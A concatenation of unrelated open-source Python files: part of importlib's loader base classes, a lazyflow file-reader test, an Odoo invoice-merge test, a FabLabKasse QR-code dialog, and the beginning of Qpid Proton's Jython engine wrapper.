def load_module(self, fullname):
"""Abstract method which when implemented should load a module.
The fullname is a str."""
raise NotImplementedError
@abc.abstractmethod
def module_repr(self, module):
"""Abstract method which when implemented calculates and returns the
given module's repr."""
raise NotImplementedError
class ResourceLoader(Loader):
"""Abstract base class for loaders which can return data from their
back-end storage.
This ABC represents one of the optional protocols specified by PEP 302.
"""
@abc.abstractmethod
def get_data(self, path):
"""Abstract method which when implemented should return the bytes for
the specified path. The path must be a str."""
raise NotImplementedError
class InspectLoader(Loader):
"""Abstract base class for loaders which support inspection about the
modules they can load.
This ABC represents one of the optional protocols specified by PEP 302.
"""
@abc.abstractmethod
def is_package(self, fullname):
"""Abstract method which when implemented should return whether the
module is a package. The fullname is a str. Returns a bool."""
raise NotImplementedError
@abc.abstractmethod
def get_code(self, fullname):
"""Abstract method which when implemented should return the code object
for the module. The fullname is a str. Returns a types.CodeType."""
raise NotImplementedError
@abc.abstractmethod
def get_source(self, fullname):
"""Abstract method which should return the source code for the
module. The fullname is a str. Returns a str."""
raise NotImplementedError
_register(InspectLoader, machinery.BuiltinImporter, machinery.FrozenImporter,
machinery.ExtensionFileLoader)
class ExecutionLoader(InspectLoader):
"""Abstract base class for loaders that wish to support the execution of
modules as scripts.
This ABC represents one of the optional protocols specified in PEP 302.
"""
@abc.abstractmethod
def get_filename(self, fullname):
"""Abstract method which should return the value that __file__ is to be
set to."""
raise NotImplementedError
class FileLoader(_bootstrap.FileLoader, ResourceLoader, ExecutionLoader):
"""Abstract base class partially implementing the ResourceLoader and
ExecutionLoader ABCs."""
_register(FileLoader, machinery.SourceFileLoader,
machinery.SourcelessFileLoader)
class SourceLoader(_bootstrap.SourceLoader, ResourceLoader, ExecutionLoader):
"""Abstract base class for loading source code (and optionally any
corresponding bytecode).
To support loading from source code, the abstractmethods inherited from
ResourceLoader and ExecutionLoader need to be implemented. To also support
loading from bytecode, the optional methods specified directly by this ABC
is required.
Inherited abstractmethods not implemented in this ABC:
* ResourceLoader.get_data
* ExecutionLoader.get_filename
"""
def path_mtime(self, path):
"""Return the (int) modification time for the path (str)."""
if self.path_stats.__func__ is SourceLoader.path_stats:
raise NotImplementedError
return int(self.path_stats(path)['mtime'])
def path_stats(self, path):
"""Return a metadata dict for the source pointed to by the path (str).
Possible keys:
- 'mtime' (mandatory) is the numeric timestamp of last source
code modification;
- 'size' (optional) is the size in bytes of the source code.
"""
if self.path_mtime.__func__ is SourceLoader.path_mtime:
raise NotImplementedError
return {'mtime': self.path_mtime(path)}
def set_data(self, path, data):
"""Write the bytes to the path (if possible).
Accepts a str path and data as bytes.
Any needed intermediary directories are to be created. If for some
reason the file cannot be written because of permissions, fail
silently.
"""
raise NotImplementedError
_register(SourceLoader, machinery.SourceFileLoader)
class PyLoader(SourceLoader):
"""Implement the deprecated PyLoader ABC in terms of SourceLoader.
This class has been deprecated! It is slated for removal in Python 3.4.
If compatibility with Python 3.1 is not needed then implement the
SourceLoader ABC instead of this class. If Python 3.1 compatibility is
needed, then use the following idiom to have a single class that is
compatible with Python 3.1 onwards::
try:
from importlib.abc import SourceLoader
except ImportError:
from importlib.abc import PyLoader as SourceLoader
class CustomLoader(SourceLoader):
def get_filename(self, fullname):
# Implement ...
def source_path(self, fullname):
'''Implement source_path in terms of get_filename.'''
try:
return self.get_filename(fullname)
except ImportError:
return None
def is_package(self, fullname):
filename = os.path.basename(self.get_filename(fullname))
return os.path.splitext(filename)[0] == '__init__'
"""
@abc.abstractmethod
def is_package(self, fullname):
raise NotImplementedError
@abc.abstractmethod
def source_path(self, fullname):
"""Abstract method. Accepts a str module name and returns the path to
the source code for the module."""
raise NotImplementedError
def get_filename(self, fullname):
"""Implement get_filename in terms of source_path.
As get_filename should only return a source file path there is no
chance of the path not existing but loading still being possible, so
ImportError should propagate instead of being turned into returning
None.
"""
warnings.warn("importlib.abc.PyLoader is deprecated and is "
"slated for removal in Python 3.4; "
"use SourceLoader instead. "
"See the importlib documentation on how to be "
"compatible with Python 3.1 onwards.",
DeprecationWarning)
path = self.source_path(fullname)
if path is None:
raise ImportError(name=fullname)
else:
return path
class PyPycLoader(PyLoader):
"""Abstract base class to assist in loading source and bytecode by
requiring only back-end storage methods to be implemented.
This class has been deprecated! Removal is slated for Python 3.4. Implement
the SourceLoader ABC instead. If Python 3.1 compatibility is needed, see
PyLoader.
The methods get_code, get_source, and load_module are implemented for the
user.
"""
def get_filename(self, fullname):
"""Return the source or bytecode file path."""
path = self.source_path(fullname)
if path is not None:
return path
path = self.bytecode_path(fullname)
if path is not None:
return path
raise ImportError("no source or bytecode path available for "
"{0!r}".format(fullname), name=fullname)
def get_code(self, fullname):
"""Get a code object from source or bytecode."""
warnings.warn("importlib.abc.PyPycLoader is deprecated and slated for "
"removal in Python 3.4; use SourceLoader instead. "
"If Python 3.1 compatibility is required, see the "
"latest documentation for PyLoader.",
DeprecationWarning)
source_timestamp = self.source_mtime(fullname)
# Try to use bytecode if it is available.
bytecode_path = self.bytecode_path(fullname)
if bytecode_path:
data = self.get_data(bytecode_path)
try:
magic = data[:4]
if len(magic) < 4:
raise ImportError(
"bad magic number in {}".format(fullname),
name=fullname, path=bytecode_path)
raw_timestamp = data[4:8]
if len(raw_timestamp) < 4:
raise EOFError("bad timestamp in {}".format(fullname))
pyc_timestamp = _bootstrap._r_long(raw_timestamp)
raw_source_size = data[8:12]
if len(raw_source_size) != 4:
raise EOFError("bad file size in {}".format(fullname))
# Source size is unused as the ABC does not provide a way to
# get the size of the source ahead of reading it.
bytecode = data[12:]
# Verify that the magic number is valid.
if imp.get_magic() != magic:
raise ImportError(
"bad magic number in {}".format(fullname),
name=fullname, path=bytecode_path)
# Verify that the bytecode is not stale (only matters when
# there is source to fall back on.
if source_timestamp:
if pyc_timestamp < source_timestamp:
raise ImportError("bytecode is stale", name=fullname,
path=bytecode_path)
except (ImportError, EOFError):
# If source is available give it a shot.
if source_timestamp is not None:
pass
else:
raise
else:
# Bytecode seems fine, so try to use it.
return marshal.loads(bytecode)
elif source_timestamp is None:
raise ImportError("no source or bytecode available to create code "
"object for {0!r}".format(fullname),
name=fullname)
# Use the source.
source_path = self.source_path(fullname)
if source_path is None:
message = "a source path must exist to load {0}".format(fullname)
raise ImportError(message, name=fullname)
source = self.get_data(source_path)
code_object = compile(source, source_path, 'exec', dont_inherit=True)
# Generate bytecode and write it out.
if not sys.dont_write_bytecode:
data = bytearray(imp.get_magic())
data.extend(_bootstrap._w_long(source_timestamp))
data.extend(_bootstrap._w_long(len(source) & 0xFFFFFFFF))
data.extend(marshal.dumps(code_object))
self.write_bytecode(fullname, data)
return code_object
@abc.abstractmethod
def source_mtime(self, fullname):
"""Abstract method. Accepts a str filename and returns an int
modification time for the source of the module."""
raise NotImplementedError
@abc.abstractmethod
def bytecode_path(self, fullname):
"""Abstract method. Accepts a str filename and returns the str pathname
to the bytecode for the module."""
raise NotImplementedError
@abc.abstractmethod
def write_bytecode(self, fullname, bytecode):
"""Abstract method. Accepts a str filename and bytes object
representing the bytecode for the module. Returns a boolean
representing whether the bytecode was written or not."""
raise NotImplementedError
| gpl-3.0 |
stuarteberg/lazyflow | tests/testOpRawBinaryFileReader.py | 1 | 2714 | ###############################################################################
# lazyflow: data flow based lazy parallel computation framework
#
# Copyright (C) 2011-2014, the ilastik developers
# <team@ilastik.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the Lesser GNU General Public License
# as published by the Free Software Foundation; either version 2.1
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# See the files LICENSE.lgpl2 and LICENSE.lgpl3 for full text of the
# GNU Lesser General Public License version 2.1 and 3 respectively.
# This information is also available on the ilastik web site at:
# http://ilastik.org/license/
###############################################################################
import os
import tempfile
import shutil
import numpy
from lazyflow.graph import Graph
from lazyflow.operators.ioOperators import OpRawBinaryFileReader
class TestOpRawBinaryFileReader(object):
def setUp(self):
# Start by writing some test data to disk.
self.testData = numpy.random.random((10, 11, 12)).astype(numpy.float32)
self.tmpDir = tempfile.mkdtemp()
# Filename must follow conventions in used by OpRawBinaryFileReader
shape_string = "-".join(map(str, self.testData.shape))
self.testDataFilePath = os.path.join(self.tmpDir, 'random-test-data-{}-float32.bin'.format(shape_string))
fp = numpy.memmap(self.testDataFilePath, dtype=self.testData.dtype, shape=self.testData.shape, mode='w+')
fp[:] = self.testData
del fp # Close file
def tearDown(self):
shutil.rmtree(self.tmpDir)
def test_OpRawBinaryFileReader(self):
# Now read back our test data using an OpRawBinaryFileReader operator
op = OpRawBinaryFileReader(graph=Graph())
try:
op.FilePath.setValue(self.testDataFilePath)
# Read the entire file and verify the contents
a = op.Output[:].wait()
assert (a == self.testData).all()
finally:
op.cleanUp()
if __name__ == "__main__":
import sys
import nose
sys.argv.append("--nocapture") # Don't steal stdout. Show it on the console as usual.
sys.argv.append("--nologcapture") # Don't set the logging level to DEBUG. Leave it alone.
ret = nose.run(defaultTest=__file__)
if not ret: sys.exit(1)
| lgpl-3.0 |
eezee-it/account-invoicing | account_invoice_merge_purchase/tests/test_account_invoice_merge_purchase.py | 3 | 8037 | # -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of account_invoice_merge_purchase,
# an Odoo module.
#
# Copyright (c) 2015 ACSONE SA/NV (<http://acsone.eu>)
#
# account_invoice_merge_purchase is free software:
# you can redistribute it and/or modify it under the terms of the GNU
# Affero General Public License as published by the Free Software
# Foundation,either version 3 of the License, or (at your option) any
# later version.
#
# account_invoice_merge_purchase is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with account_invoice_merge_purchase.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.tests import common
from openerp import workflow
from datetime import datetime
def create_simple_po(self, partner, invoice_method):
vals = {'partner_id': partner.id,
'invoice_method': invoice_method,
'location_id': self.ref('stock.stock_location_stock'),
'pricelist_id': self.ref('purchase.list0'),
'order_line': [(0, 0, {'name': 'test',
'date_planned': datetime.today(),
'price_unit': 10,
})]
}
return self.po_obj.create(vals)
def pay_invoice(self, invoice):
aml = self.aml_obj.search(
[('account_id.type', 'in', ['payable', 'receivable']),
('invoice.id', '=', invoice.id)])
ctx = self.context.copy()
ctx.update({'active_ids': [aml.id]})
writeoff = self.writeoff_obj.with_context(active_ids=[aml.id]).create(
{'journal_id': self.journal01.id,
'writeoff_acc_id': self.account01.id})
writeoff.trans_rec_reconcile()
def invoice_picking(self, picking):
wizard = self.invoice_picking_wiz.with_context(active_ids=[picking.id])\
.create({})
return wizard.with_context(active_ids=[picking.id]).create_invoice()
class TestAccountInvoiceMergePurchase(common.TransactionCase):
def setUp(self):
super(TestAccountInvoiceMergePurchase, self).setUp()
self.partner01 = self.env.ref('base.res_partner_1')
self.context = self.env['res.users'].context_get()
self.po_obj = self.env['purchase.order']
self.inv_obj = self.env['account.invoice']
self.aml_obj = self.env['account.move.line']
self.journal01 = self.env.ref('account.miscellaneous_journal')
self.account01 = self.env.ref('account.a_pay')
self.writeoff_obj = self.env['account.move.line.reconcile.writeoff']
self.picking_obj = self.env['stock.picking']
self.invoice_picking_wiz = self.env['stock.invoice.onshipping']
def test_order_multi_purchase_order(self):
purchase_order01 = create_simple_po(self, self.partner01, 'order')
# I confirm the purchase order
workflow.trg_validate(self.uid, 'purchase.order',
purchase_order01.id, 'purchase_confirm',
self.cr)
# I check if the purchase order is confirmed
purchase_order01.invalidate_cache()
self.assertEqual(purchase_order01.state, 'approved',
"Purchase order's state isn't correct")
invoice_ids = purchase_order01.invoice_ids.ids
purchase_order02 = purchase_order01.copy()
# I confirm the second purchase order
workflow.trg_validate(self.uid, 'purchase.order',
purchase_order02.id, 'purchase_confirm',
self.cr)
# I check if the purchase order is confirmed
purchase_order02.invalidate_cache()
self.assertEqual(purchase_order02.state, 'approved',
"Purchase order's state isn't correct")
invoice_ids.extend(purchase_order02.invoice_ids.ids)
invoices = self.inv_obj.browse(invoice_ids)
invoices_info, invoice_lines_info = invoices.do_merge()
new_invoice_ids = invoices_info.keys()
# Ensure there is only one new invoice
self.assertEqual(len(new_invoice_ids), 1)
# Check invoice_lines_info
invoice_lines = invoices.mapped('invoice_line')
for v in invoice_lines_info:
for k in invoice_lines_info[v]:
self.assertIn(k, invoice_lines._ids,
"Incorrect Invoice Line Mapping")
# I post the created invoice
workflow.trg_validate(self.uid, 'account.invoice', new_invoice_ids[0],
'invoice_open', self.cr)
# I pay the merged invoice
invoice = self.inv_obj.browse(new_invoice_ids)[0]
pay_invoice(self, invoice)
# I check if merge invoice is paid
self.assertEqual(invoice.state, 'paid')
purchase_order01.invalidate_cache()
# I check if purchase order are done
self.assertEqual(purchase_order01.state, 'done')
self.assertEqual(purchase_order02.state, 'done')
def test_picking_multi_purchase_order(self):
purchase_order01 = self.env.ref('purchase.purchase_order_1')
# I set the invoice method to picking
purchase_order01.invoice_method = 'picking'
# I confirm the purchase order
workflow.trg_validate(self.uid, 'purchase.order',
purchase_order01.id, 'purchase_confirm',
self.cr)
# I check if the purchase order is confirmed
purchase_order01.invalidate_cache()
self.assertEqual(purchase_order01.state, 'approved',
"Purchase order's state isn't correct")
# I check if there is a picking
self.assertEqual(len(purchase_order01.picking_ids.ids), 1)
picking01 = purchase_order01.picking_ids[0]
# I transfer the picking
picking01.do_transfer()
invoice_ids = invoice_picking(self, picking01)
purchase_order02 = purchase_order01.copy()
# I set the invoice method to picking
purchase_order02.invoice_method = 'picking'
# I confirm the second purchase order
workflow.trg_validate(self.uid, 'purchase.order',
purchase_order02.id, 'purchase_confirm',
self.cr)
# I check if the purchase order is confirmed
purchase_order02.invalidate_cache()
self.assertEqual(purchase_order02.state, 'approved',
"Purchase order's state isn't correct")
# I check if there is a picking
self.assertEqual(len(purchase_order02.picking_ids.ids), 1)
picking02 = purchase_order02.picking_ids[0]
# I transfer the picking
picking02.do_transfer()
invoice_ids.extend(invoice_picking(self, picking02))
invoices = self.inv_obj.browse(invoice_ids)
invoices_info = invoices.do_merge()[0]
new_invoice_ids = invoices_info.keys()
# Ensure there is only one new invoice
self.assertEqual(len(new_invoice_ids), 1)
# I post the created invoice
workflow.trg_validate(self.uid, 'account.invoice', new_invoice_ids[0],
'invoice_open', self.cr)
# I pay the merged invoice
invoice = self.inv_obj.browse(new_invoice_ids)[0]
pay_invoice(self, invoice)
# I check if merge invoice is paid
self.assertEqual(invoice.state, 'paid')
purchase_order01.invalidate_cache()
# I check if purchase order are done
self.assertEqual(purchase_order01.state, 'done')
self.assertEqual(purchase_order02.state, 'done')
| agpl-3.0 |
fau-fablab/FabLabKasse | FabLabKasse/UI/LoadFromMobileAppDialogCode.py | 1 | 3567 | #!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
#
# FabLabKasse, a Point-of-Sale Software for FabLabs and other public and trust-based workshops.
# Copyright (C) 2015 Julian Hammer <julian.hammer@fablab.fau.de>
# Maximilian Gaukler <max@fablab.fau.de>
# Timo Voigt <timo@fablab.fau.de>
# and others
#
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU
# General Public License as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with this program. If not,
# see <http://www.gnu.org/licenses/>.
"""dialog for loading the cart from a mobile application.
It shows a QR Code as one-time-token for authentication."""
from PyQt4 import QtGui, QtCore
from FabLabKasse.UI.uic_generated.LoadFromMobileAppDialog import Ui_LoadFromMobileAppDialog
import qrcode
import StringIO
def set_layout_items_visible(layout, visible):
"""
hide/show all widgets in a QLayout
:type layout: QtGui.QLayout
:type visible: boolean
"""
for i in range(layout.count()):
if isinstance(layout.itemAt(i), QtGui.QLayout):
# recurse to sub-layout
set_layout_items_visible(layout.itemAt(i), visible)
widget = layout.itemAt(i).widget()
if widget is not None:
widget.setVisible(visible)
class LoadFromMobileAppDialog(QtGui.QDialog, Ui_LoadFromMobileAppDialog):
"""dialog for loading the cart from a mobile application.
It shows a QR Code as one-time-token for authentication."""
def __init__(self, parent, app_url):
QtGui.QDialog.__init__(self, parent)
self.setupUi(self)
# maximize window - WORKAROUND because showMaximized() doesn't work
# when a default geometry is set in the Qt designer file
QtCore.QTimer.singleShot(0, lambda: self.setWindowState(QtCore.Qt.WindowMaximized))
set_layout_items_visible(self.verticalLayout_app_download, False)
self.pushButton_app.clicked.connect(self._show_app_download)
if app_url is None:
self.pushButton_app.setVisible(False)
else:
LoadFromMobileAppDialog.set_qr_label(self.label_qr_app, app_url)
self.label_qr_app_url.setText(app_url)
def _show_app_download(self):
"""hide the random QR code, show the one for the appstore"""
set_layout_items_visible(self.verticalLayout_qr, False)
set_layout_items_visible(self.verticalLayout_app_download, True)
self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.Ok)
def set_random_code(self, random_code):
"""update the QR code showing the cart id"""
LoadFromMobileAppDialog.set_qr_label(self.label_qr_random, random_code)
@staticmethod
def set_qr_label(label, text):
"""
set qrcode image on QLabel
:param label: QLabel
:param text: text for the QR code
"""
buf = StringIO.StringIO()
img = qrcode.make(text)
img.save(buf, "PNG")
label.setText("")
qt_pixmap = QtGui.QPixmap()
qt_pixmap.loadFromData(buf.getvalue(), "PNG")
label.setPixmap(qt_pixmap)
| gpl-3.0 |
jeckersb/Proton | proton-j/src/main/resources/cengine.py | 2 | 28835 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from org.apache.qpid.proton import Proton
from org.apache.qpid.proton.amqp import Symbol
from org.apache.qpid.proton.amqp.messaging import Source, Target, \
TerminusDurability, TerminusExpiryPolicy, Received, Accepted, \
Rejected, Released, Modified
from org.apache.qpid.proton.amqp.transaction import Coordinator
from org.apache.qpid.proton.amqp.transport import ErrorCondition, \
SenderSettleMode, ReceiverSettleMode
from org.apache.qpid.proton.engine import EndpointState, Sender, \
Receiver, Transport as _Transport, TransportException
from java.util import EnumSet
from jarray import array, zeros
from cerror import *
from ccodec import *
# from proton/engine.h
PN_LOCAL_UNINIT = 1
PN_LOCAL_ACTIVE = 2
PN_LOCAL_CLOSED = 4
PN_REMOTE_UNINIT = 8
PN_REMOTE_ACTIVE = 16
PN_REMOTE_CLOSED = 32
PN_SND_UNSETTLED = 0
PN_SND_SETTLED = 1
PN_SND_MIXED = 2
PN_RCV_FIRST = 0
PN_RCV_SECOND = 1
PN_UNSPECIFIED = 0
PN_SOURCE = 1
PN_TARGET = 2
PN_COORDINATOR = 3
PN_NONDURABLE = 0
PN_CONFIGURATION = 1
PN_DELIVERIES = 2
PN_EXPIRE_WITH_LINK = 0
PN_EXPIRE_WITH_SESSION = 1
PN_EXPIRE_WITH_CONNECTION = 2
PN_EXPIRE_NEVER = 3
PN_DIST_MODE_UNSPECIFIED = 0
PN_DIST_MODE_COPY = 1
PN_DIST_MODE_MOVE = 2
PN_RECEIVED = (0x0000000000000023)
PN_ACCEPTED = (0x0000000000000024)
PN_REJECTED = (0x0000000000000025)
PN_RELEASED = (0x0000000000000026)
PN_MODIFIED = (0x0000000000000027)
PN_TRACE_OFF = _Transport.TRACE_OFF
PN_TRACE_RAW = _Transport.TRACE_RAW
PN_TRACE_FRM = _Transport.TRACE_FRM
PN_TRACE_DRV = _Transport.TRACE_DRV
def wrap(obj, wrapper):
if obj:
ctx = obj.getContext()
if not ctx:
ctx = wrapper(obj)
obj.setContext(ctx)
return ctx
class pn_condition:
def __init__(self):
self.name = None
self.description = None
self.info = pn_data(0)
def decode(self, impl):
if impl is None:
self.name = None
self.description = None
self.info.clear()
else:
cond = impl.getCondition()
if cond is None:
self.name = None
else:
self.name = cond.toString()
self.description = impl.getDescription()
obj2dat(impl.getInfo(), self.info)
def encode(self):
if self.name is None:
return None
else:
impl = ErrorCondition()
impl.setCondition(Symbol.valueOf(self.name))
impl.setDescription(self.description)
impl.setInfo(dat2obj(self.info))
return impl
def pn_condition_is_set(cond):
return bool(cond.name)
def pn_condition_get_name(cond):
return cond.name
def pn_condition_set_name(cond, name):
cond.name = name
def pn_condition_get_description(cond):
return cond.description
def pn_condition_set_description(cond, description):
cond.description = description
def pn_condition_clear(cond):
cond.name = None
cond.description = None
cond.info.clear()
def pn_condition_info(cond):
return cond.info
class endpoint_wrapper:
def __init__(self, impl):
self.impl = impl
self.attachments = {}
self.condition = pn_condition()
self.remote_condition = pn_condition()
def on_close(self):
cond = self.condition.encode()
if cond:
self.impl.setCondition(cond)
def remote_condition(self):
self.remote_condition.decode(self.impl.getRemoteCondition())
return self.remote_condition
class pn_connection_wrapper(endpoint_wrapper):
def __init__(self, impl):
endpoint_wrapper.__init__(self, impl)
self.properties = pn_data(0)
self.offered_capabilities = pn_data(0)
self.desired_capabilities = pn_data(0)
def pn_connection():
return wrap(Proton.connection(), pn_connection_wrapper)
def set2mask(local, remote):
mask = 0
if local.contains(EndpointState.UNINITIALIZED):
mask |= PN_LOCAL_UNINIT
if local.contains(EndpointState.ACTIVE):
mask |= PN_LOCAL_ACTIVE
if local.contains(EndpointState.CLOSED):
mask |= PN_LOCAL_CLOSED
if remote.contains(EndpointState.UNINITIALIZED):
mask |= PN_REMOTE_UNINIT
if remote.contains(EndpointState.ACTIVE):
mask |= PN_REMOTE_ACTIVE
if remote.contains(EndpointState.CLOSED):
mask |= PN_REMOTE_CLOSED
return mask
def endpoint_state(impl):
return set2mask(EnumSet.of(impl.getLocalState()),
EnumSet.of(impl.getRemoteState()))
def pn_connection_state(conn):
return endpoint_state(conn.impl)
def pn_connection_condition(conn):
return conn.condition
def pn_connection_remote_condition(conn):
return remote_condition(conn)
def pn_connection_properties(conn):
return conn.properties
def pn_connection_remote_properties(conn):
return obj2dat(conn.impl.getRemoteProperties())
def pn_connection_offered_capabilities(conn):
return conn.offered_capabilities
def pn_connection_remote_offered_capabilities(conn):
return array2dat(conn.impl.getRemoteOfferedCapabilities(), PN_SYMBOL)
def pn_connection_desired_capabilities(conn):
return conn.desired_capabilities
def pn_connection_remote_desired_capabilities(conn):
return array2dat(conn.impl.getRemoteDesiredCapabilities(), PN_SYMBOL)
def pn_connection_attachments(conn):
return conn.attachments
def pn_connection_set_container(conn, name):
conn.impl.setContainer(name)
def pn_connection_get_container(conn):
return conn.impl.getContainer()
def pn_connection_remote_container(conn):
return conn.impl.getRemoteContainer()
def pn_connection_get_hostname(conn):
return conn.impl.getHostname()
def pn_connection_set_hostname(conn, name):
conn.impl.setHostname(name)
def pn_connection_remote_hostname(conn):
return conn.impl.getRemoteHostname()
def pn_connection_open(conn):
props = dat2obj(conn.properties)
offered = dat2obj(conn.offered_capabilities)
desired = dat2obj(conn.desired_capabilities)
if props:
conn.impl.setProperties(props)
if offered:
conn.impl.setOfferedCapabilities(array(list(offered), Symbol))
if desired:
conn.impl.setDesiredCapabilities(array(list(desired), Symbol))
conn.impl.open()
def pn_connection_close(conn):
conn.on_close()
conn.impl.close()
def pn_connection_release(conn):
conn.impl.free()
def pn_connection_transport(conn):
return wrap(conn.impl.getTransport(), pn_transport_wrapper)
class pn_session_wrapper(endpoint_wrapper):
pass
def pn_session(conn):
return wrap(conn.impl.session(), pn_session_wrapper)
def pn_session_attachments(ssn):
return ssn.attachments
def pn_session_state(ssn):
return endpoint_state(ssn.impl)
def pn_session_get_incoming_capacity(ssn):
return ssn.impl.getIncomingCapacity()
def pn_session_set_incoming_capacity(ssn, capacity):
ssn.impl.setIncomingCapacity(capacity)
def pn_session_incoming_bytes(ssn):
return ssn.impl.getIncomingBytes()
def pn_session_outgoing_bytes(ssn):
return ssn.impl.getOutgoingBytes()
def pn_session_condition(ssn):
return ssn.condition
def pn_session_remote_condition(ssn):
return remote_condition(ssn)
def pn_session_open(ssn):
ssn.impl.open()
def pn_session_close(ssn):
ssn.on_close()
ssn.impl.close()
def mask2set(mask):
local = []
remote = []
if PN_LOCAL_UNINIT & mask:
local.append(EndpointState.UNINITIALIZED)
if PN_LOCAL_ACTIVE & mask:
local.append(EndpointState.ACTIVE)
if PN_LOCAL_CLOSED & mask:
local.append(EndpointState.CLOSED)
if PN_REMOTE_UNINIT & mask:
remote.append(EndpointState.UNINITIALIZED)
if PN_REMOTE_ACTIVE & mask:
remote.append(EndpointState.ACTIVE)
if PN_REMOTE_CLOSED & mask:
remote.append(EndpointState.CLOSED)
if local:
local = EnumSet.of(*local)
else:
local = None
if remote:
remote = EnumSet.of(*remote)
else:
remote = None
return local, remote
def pn_session_head(conn, mask):
local, remote = mask2set(mask)
return wrap(conn.impl.sessionHead(local, remote), pn_session_wrapper)
def pn_session_connection(ssn):
return wrap(ssn.impl.getConnection(), pn_connection_wrapper)
def pn_sender(ssn, name):
return wrap(ssn.impl.sender(name), pn_link_wrapper)
def pn_receiver(ssn, name):
return wrap(ssn.impl.receiver(name), pn_link_wrapper)
def pn_session_free(ssn):
ssn.impl.free()
TERMINUS_TYPES_J2P = {
Source: PN_SOURCE,
Target: PN_TARGET,
Coordinator: PN_COORDINATOR,
None.__class__: PN_UNSPECIFIED
}
TERMINUS_TYPES_P2J = {
PN_SOURCE: Source,
PN_TARGET: Target,
PN_COORDINATOR: Coordinator,
PN_UNSPECIFIED: lambda: None
}
DURABILITY_P2J = {
PN_NONDURABLE: TerminusDurability.NONE,
PN_CONFIGURATION: TerminusDurability.CONFIGURATION,
PN_DELIVERIES: TerminusDurability.UNSETTLED_STATE
}
DURABILITY_J2P = {
TerminusDurability.NONE: PN_NONDURABLE,
TerminusDurability.CONFIGURATION: PN_CONFIGURATION,
TerminusDurability.UNSETTLED_STATE: PN_DELIVERIES
}
EXPIRY_POLICY_P2J = {
PN_EXPIRE_WITH_LINK: TerminusExpiryPolicy.LINK_DETACH,
PN_EXPIRE_WITH_SESSION: TerminusExpiryPolicy.SESSION_END,
PN_EXPIRE_WITH_CONNECTION: TerminusExpiryPolicy.CONNECTION_CLOSE,
PN_EXPIRE_NEVER: TerminusExpiryPolicy.NEVER
}
EXPIRY_POLICY_J2P = {
TerminusExpiryPolicy.LINK_DETACH: PN_EXPIRE_WITH_LINK,
TerminusExpiryPolicy.SESSION_END: PN_EXPIRE_WITH_SESSION,
TerminusExpiryPolicy.CONNECTION_CLOSE: PN_EXPIRE_WITH_CONNECTION,
TerminusExpiryPolicy.NEVER: PN_EXPIRE_NEVER
}
DISTRIBUTION_MODE_P2J = {
PN_DIST_MODE_UNSPECIFIED: None,
PN_DIST_MODE_COPY: Symbol.valueOf("copy"),
PN_DIST_MODE_MOVE: Symbol.valueOf("move")
}
DISTRIBUTION_MODE_J2P = {
None: PN_DIST_MODE_UNSPECIFIED,
Symbol.valueOf("copy"): PN_DIST_MODE_COPY,
Symbol.valueOf("move"): PN_DIST_MODE_MOVE
}
class pn_terminus:
def __init__(self, type):
self.type = type
self.address = None
self.durability = PN_NONDURABLE
self.expiry_policy = PN_EXPIRE_WITH_SESSION
self.distribution_mode = PN_DIST_MODE_UNSPECIFIED
self.timeout = 0
self.dynamic = False
self.properties = pn_data(0)
self.capabilities = pn_data(0)
self.outcomes = pn_data(0)
self.filter = pn_data(0)
def copy(self, src):
self.type = src.type
self.address = src.address
self.durability = src.durability
self.expiry_policy = src.expiry_policy
self.timeout = src.timeout
self.dynamic = src.dynamic
self.properties = src.properties
self.capabilities = src.capabilities
self.outcomes = src.outcomes
self.filter = src.filter
def decode(self, impl):
if impl is not None:
self.type = TERMINUS_TYPES_J2P[impl.__class__]
if self.type in (PN_SOURCE, PN_TARGET):
self.address = impl.getAddress()
self.durability = DURABILITY_J2P[impl.getDurable()]
self.expiry_policy = EXPIRY_POLICY_J2P[impl.getExpiryPolicy()]
self.timeout = impl.getTimeout().longValue()
self.dynamic = impl.getDynamic()
obj2dat(impl.getDynamicNodeProperties(), self.properties)
array2dat(impl.getCapabilities(), PN_SYMBOL, self.capabilities)
if self.type == PN_SOURCE:
self.distribution_mode = DISTRIBUTION_MODE_J2P[impl.getDistributionMode()]
array2dat(impl.getOutcomes(), PN_SYMBOL, self.outcomes)
obj2dat(impl.getFilter(), self.filter)
def encode(self):
impl = TERMINUS_TYPES_P2J[self.type]()
if self.type in (PN_SOURCE, PN_TARGET):
impl.setAddress(self.address)
impl.setDurable(DURABILITY_P2J[self.durability])
impl.setExpiryPolicy(EXPIRY_POLICY_P2J[self.expiry_policy])
impl.setTimeout(UnsignedInteger.valueOf(self.timeout))
impl.setDynamic(self.dynamic)
props = dat2obj(self.properties)
caps = dat2obj(self.capabilities)
if props: impl.setDynamicNodeProperties(props)
if caps:
impl.setCapabilities(*array(list(caps), Symbol))
if self.type == PN_SOURCE:
impl.setDistributionMode(DISTRIBUTION_MODE_P2J[self.distribution_mode])
outcomes = dat2obj(self.outcomes)
filter = dat2obj(self.filter)
if outcomes: impl.setOutcomes(outcomes)
if filter: impl.setFilter(filter)
return impl
def pn_terminus_get_type(terminus):
return terminus.type
